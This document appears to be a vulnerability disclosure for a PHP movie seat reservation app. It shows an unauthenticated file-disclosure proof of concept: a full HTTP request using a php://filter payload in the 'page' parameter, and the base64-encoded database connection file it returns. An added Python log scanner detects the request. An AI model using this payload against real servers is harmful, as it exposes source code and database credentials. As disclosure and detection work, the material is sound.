Movie Seat Reservation System File Disclosure

  • Note: no login is required

Exploit

  • Exploit with Burp Suite
http://192.168.1.101:8080/Movie_Seat_Reservation_System/index.php?page=home

  • Use Burp Suite to capture the request, add the payload, and send it
  • Then Base64-decode the response
 PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywnJywndGhlYXRlcl9kYicpb3IgZGllKCJDb3VsZCBub3QgY29ubmVjdCB0byBteXNxbCIubXlzcWxpX2Vycm9yKCRjb24pKTsNCg==    

Vulnerable Code

[image: screenshot of the vulnerable code]

POC

  • Request
GET /Movie_Seat_Reservation_System/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1
Host: 192.168.1.101:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Movie_Seat_Reservation_System/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=0722dtqnb1dgvuono8uubajcae
Connection: close
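
Detection

A way to find the request above in web server access logs, as an added example that is not part of the original write-up. It flags any `page` value that names a stream wrapper and reports which file the `resource=` part asked for; the log lines, client addresses, timestamps and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed access-log lines (combined log format). Lines 2 and 3 mirror
# the PoC request; client addresses and timestamps are made up.
SAMPLE_LOG = [
    '192.168.1.50 - - [01/Jan/2024:10:00:00 +0000] "GET /Movie_Seat_Reservation_System/index.php?page=home HTTP/1.1" 200 5120',
    '192.168.1.66 - - [01/Jan/2024:10:00:05 +0000] "GET /Movie_Seat_Reservation_System/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1" 200 412',
    '192.168.1.66 - - [01/Jan/2024:10:00:09 +0000] "GET /Movie_Seat_Reservation_System/index.php?page=PHP%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dadmin%2Fdb_connect HTTP/1.1" 200 412',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')       # request target
SCHEME_RE = re.compile(r"^\s*([a-z][a-z0-9.+-]*)://", re.I)  # wrapper prefix
RESOURCE_RE = re.compile(r"resource=([^|\s]+)", re.I)        # file requested

def fully_decode(value, rounds=3):
    """Undo percent-encoding that was applied more than once."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_target(target, param="page"):
    """Return wrapper and resource if the page value names a stream wrapper."""
    query = target.partition("?")[2]
    for raw in parse_qs(query, keep_blank_values=True).get(param, []):
        value = fully_decode(raw)  # parse_qs has already decoded once
        scheme = SCHEME_RE.match(value)
        if scheme:
            res = RESOURCE_RE.search(value)
            return {"wrapper": scheme.group(1).lower(),
                    "resource": res.group(1) if res else None}
    return None

def scan(lines):
    """Return (line_number, client, finding) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        req = REQUEST_RE.search(line)
        finding = inspect_target(req.group(1)) if req else None
        if finding:
            hits.append((number, line.split()[0], finding))
    return hits

if __name__ == "__main__":
    for number, client, finding in scan(SAMPLE_LOG):
        print(number, client, finding)
```

A hit on `admin/db_connect` means the database connection settings in that file were returned to the client and should be treated as exposed.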